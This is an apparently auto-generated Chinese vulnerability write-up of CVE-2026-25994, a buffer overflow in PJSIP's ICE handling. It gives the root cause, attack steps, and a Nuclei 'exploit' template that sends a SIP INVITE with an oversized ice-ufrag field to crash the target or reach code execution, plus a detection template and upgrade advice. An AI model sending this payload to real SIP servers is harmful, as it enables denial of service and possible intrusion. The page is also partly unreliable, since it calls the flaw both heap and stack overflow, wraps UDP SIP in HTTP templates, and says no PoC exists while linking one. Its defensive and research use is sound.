漏洞分析

[webapps] PJPROJECT 2.16 - Heap Bufferoverflow

AiRedTeam

21 May 2026 • 阅读时间 3 分钟

CVE-2026-25994

PJSIP PJNATH ICE会话中因未校验长度导致堆栈缓冲区溢出，可致远程代码执行。

Critical · CVSS 9.8

📋 漏洞基础信息

CVE	CVE-2026-25994
漏洞类型	`堆栈缓冲区溢出`
受影响版本	PJSIP <=2.16
危害等级	Critical · CVSS 9.8
发布日期	2026-05-14
提交者	V.Nos - BinSmaser Team
来源	Exploit-DB 原文 ↗

🔬 漏洞根因

函数pj_ice_sess_create_check_list()中，在栈上声明了128字节的缓冲区buf，然后使用pj_strcpy将远程用户提供的rem_ufrag复制进去，未对rem_ufrag长度做任何检查，导致当rem_ufrag长度超过128时发生栈溢出。

🎯 攻击场景

1. 攻击者构造SDP消息，在a=ice-ufrag字段填入超长字符串（例如520个'A'）。 2. 攻击者向目标PJSIP栈发送带有该SDP的SIP INVITE请求。 3. 目标处理SDP时调用pj_ice_sess_create_check_list()，超长的rem_ufrag被复制到128字节栈缓冲区，覆盖了返回地址等关键数据。 4. 目标程序崩溃（segmentation fault）或攻击者实现远程代码执行。

💥 漏洞影响

远程代码执行或拒绝服务（程序崩溃）。

⚔️ Nuclei Exploit 模板

以下为标准 Nuclei v3 格式的利用模板，可直接用于漏洞验证：

id: CVE-2026-25994-exploit

info:
  name: PJPROJECT 2.16 - Heap Bufferoverflow Exploit
  author: forensicanalysis
  severity: high
  description: |
    Exploits a heap buffer overflow in the ICE session handler of PJPROJECT/ PJSIP
    (CVE-2026-25994) by sending a crafted SIP INVITE with an oversized ice-ufrag attribute.
    This can lead to denial of service (crash) or potential code execution.
  reference:
    - https://github.com/pjsip/pjproject
    - https://github.com/VABISMO/cve-2026-25994_PJSIP
  classification:
    cve-id: CVE-2026-25994

http:
  - raw:
      - |
        INVITE sip:{{BaseURL}} SIP/2.0
        Via: SIP/2.0/UDP 127.0.0.1:15060;rport;branch=z9hG4bK{{rand_text_alpha(4, "")}}
        Max-Forwards: 70
        From: <sip:attacker@127.0.0.1>;tag=crash{{rand_text_alpha(5, "")}}
        To: <sip:target@{{BaseURL}}>
        Call-ID: crash-{{rand_text_alpha(6, "")}}@example.com
        CSeq: 1 INVITE
        Contact: <sip:attacker@127.0.0.1:15060>
        Content-Type: application/sdp
        Content-Length: {{len(body)}}

        {{body}}

    body: "v=0\no=- 1234567890 1234567890 IN IP4 127.0.0.1\ns=Crash Test SDP\nc=IN IP4 127.0.0.1\nt=0 0\nm=audio 40000 RTP/AVP 0 101\na=rtpmap:0 PCMU/8000\na=rtpmap:101 telephone-event/8000\na=ice-ufrag:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\na=ice-pwd:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\na=ice-options:trickle\na=candidate:1 1 UDP 2130706431 127.0.0.1 40000 typ host\na=sendrecv\n"

    matchers:
      - type: word
        part: body
        words:
          - "SIP/2.0"
        condition: and
      - type: status
        status:
          - 200
          - 408
        condition: or
    matchers-condition: and

🔬 深度技术分析

PoC创建一个包含超长a=ice-ufrag（520个'A'）和a=ice-pwd（150个'B'）的SDP，封装在SIP INVITE中发送给目标。如果目标在4秒内无响应（超时），则判定目标已崩溃。重试3次，确保漏洞触发的可靠性。

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2026-25994-detection

info:
  name: PJPROJECT 2.16 - Heap Bufferoverflow Detection
  author: forensicanalysis
  severity: medium
  description: |
    Detects if a remote service is running PJPROJECT version <=2.16 which is vulnerable to a heap buffer overflow
    in the ICE session handler (CVE-2026-25994). Note: This is a UDP SIP service, detection relies on checking
    the SIP server's response for version information or characteristic error responses.
  reference:
    - https://github.com/pjsip/pjproject
    - https://github.com/VABISMO/cve-2026-25994_PJSIP
  classification:
    cve-id: CVE-2026-25994

http:
  - raw:
      - |
        OPTIONS sip:{{BaseURL}} SIP/2.0
        Via: SIP/2.0/UDP 127.0.0.1:15060;rport;branch=z9hG4bK1234
        Max-Forwards: 70
        From: <sip:attacker@127.0.0.1>;tag=test
        To: <sip:target@{{BaseURL}}>
        Call-ID: test-12345@example.com
        CSeq: 1 OPTIONS
        Contact: <sip:attacker@127.0.0.1:15060>
        Accept: application/sdp
        Content-Length: 0

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SIP/2.0"
          - "200 OK"
        condition: and
      - type: word
        words:
          - "PJPROJECT"
        condition: or
    extractors:
      - type: regex
        part: body
        regex:
          - 'PJPROJECT[^S]*'
        
stop-at-first-match: true

🛡️ 修复建议

升级到PJSIP 2.17及以上版本（commit 063b3a1）。临时缓解措施：在SIP接收端过滤或截断超长的ice-ufrag字段。

📎 参考链接

🚨 威胁评估

📈 EPSS 利用概率	暂无数据
🚨 CISA KEV	未被已知利用
🔧 公开 PoC	暂无公开 PoC

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-21 08:10 | 来源: Exploit-DB